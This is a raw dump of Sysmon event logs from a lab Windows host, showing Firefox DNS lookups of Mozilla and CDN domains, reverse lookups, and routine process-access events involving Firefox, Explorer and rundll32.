22542200x800000000000000017106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.743{59A5CD1D-945A-6005-3305-00000000A301}7052fennec-catalog-cdn.prod.mozaws.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.740{59A5CD1D-945A-6005-3305-00000000A301}7052fennec-catalog-cdn.prod.mozaws.net013.227.156.80;13.227.156.117;13.227.156.12;13.227.156.64;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.739{59A5CD1D-945A-6005-3305-00000000A301}7052firefox-settings-attachments.cdn.mozilla.net0type: 5 fennec-catalog-cdn.prod.mozaws.net;::ffff:13.227.156.64;::ffff:13.227.156.80;::ffff:13.227.156.117;::ffff:13.227.156.12;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.531{59A5CD1D-945A-6005-3305-00000000A301}7052a1887.dscq.akamai.net02a02:26f0:eb::214:bd82;2a02:26f0:eb::214:bd5a;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:59.529{59A5CD1D-945A-6005-3305-00000000A301}7052a1887.dscq.akamai.net023.55.163.58;23.55.163.48;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.529{59A5CD1D-945A-6005-3305-00000000A301}7052r3.o.lencr.org0type: 5 o.lencr.edgesuite.net;type: 5 a1887.dscq.akamai.net;::ffff:23.55.163.48;::ffff:23.55.163.58;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.522{59A5CD1D-945A-6005-3305-00000000A301}7052autopush.prod.mozaws.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.508{59A5CD1D-945A-6005-3305-00000000A301}7052autopush.prod.mozaws.net035.165.114.190;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.507{59A5CD1D-945A-6005-3305-00000000A301}7052push.services.mozilla.com0type: 5 autopush.prod.mozaws.net;::ffff:35.165.114.190;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.419{59A5CD1D-945A-6005-3305-00000000A301}7052shavar.prod.mozaws.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.414{59A5CD1D-945A-6005-3305-00000000A301}7052shavar.prod.mozaws.net044.233.8.168;44.236.152.85;52.36.207.147;52.43.72.100;34.216.48.72;34.216.80.151;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.414{59A5CD1D-945A-6005-3305-00000000A301}7052shavar.services.mozilla.com0type: 5 
shavar.prod.mozaws.net;::ffff:34.216.80.151;::ffff:44.233.8.168;::ffff:44.236.152.85;::ffff:52.36.207.147;::ffff:52.43.72.100;::ffff:34.216.48.72;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.365{59A5CD1D-945A-6005-3305-00000000A301}7052locprod2-elb-us-west-2.prod.mozaws.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.363{59A5CD1D-945A-6005-3305-00000000A301}7052locprod2-elb-us-west-2.prod.mozaws.net052.42.151.74;34.210.121.31;34.216.198.143;44.237.173.75;44.238.41.205;52.41.252.192;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.362{59A5CD1D-945A-6005-3305-00000000A301}7052location.services.mozilla.com0type: 5 locprod2-elb-us-west-2.prod.mozaws.net;::ffff:52.41.252.192;::ffff:52.42.151.74;::ffff:34.210.121.31;::ffff:34.216.198.143;::ffff:44.237.173.75;::ffff:44.238.41.205;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.286{59A5CD1D-8E56-6005-2E00-00000000A301}246436.75.98.34.in-addr.arpa.0type: 12 36.75.98.34.bc.googleusercontent.com;C:\Windows\sysmon64.exe 10341000x800000000000000017090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.661{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.614{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.614{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.598{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.598{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.598{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.583{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.583{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.567{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.567{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.548{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.548{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.548{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.505{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.505{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.505{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.317{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.317{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.270{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.270{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.504{59A5CD1D-945A-6005-3305-00000000A301}7052img-prod.pocket.prod.cloudops.mozgcp.net02600:1901:0:e988::;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.481{59A5CD1D-945A-6005-3305-00000000A301}7052img-prod.pocket.prod.cloudops.mozgcp.net034.120.237.76;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.480{59A5CD1D-945A-6005-3305-00000000A301}7052img-getpocket.cdn.mozilla.net0type: 5 
img-getpocket-cdn.prod.mozaws.net;type: 5 img-prod.pocket.prod.cloudops.mozgcp.net;::ffff:34.120.237.76;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.364{59A5CD1D-8E56-6005-2E00-00000000A301}2464192.252.41.52.in-addr.arpa.0type: 12 ec2-52-41-252-192.us-west-2.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.307{59A5CD1D-8E56-6005-2E00-00000000A301}246482.221.107.34.in-addr.arpa.0type: 12 82.221.107.34.bc.googleusercontent.com;C:\Windows\sysmon64.exe 22542200x800000000000000017175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.288{59A5CD1D-8E56-6005-2E00-00000000A301}2464122.90.84.99.in-addr.arpa.0type: 12 server-99-84-90-122.muc50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.287{59A5CD1D-8E56-6005-2E00-00000000A301}2464221.5.120.34.in-addr.arpa.0type: 12 221.5.120.34.bc.googleusercontent.com;C:\Windows\sysmon64.exe 10341000x800000000000000017173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:01.786{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000017172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:01.786{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.661{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 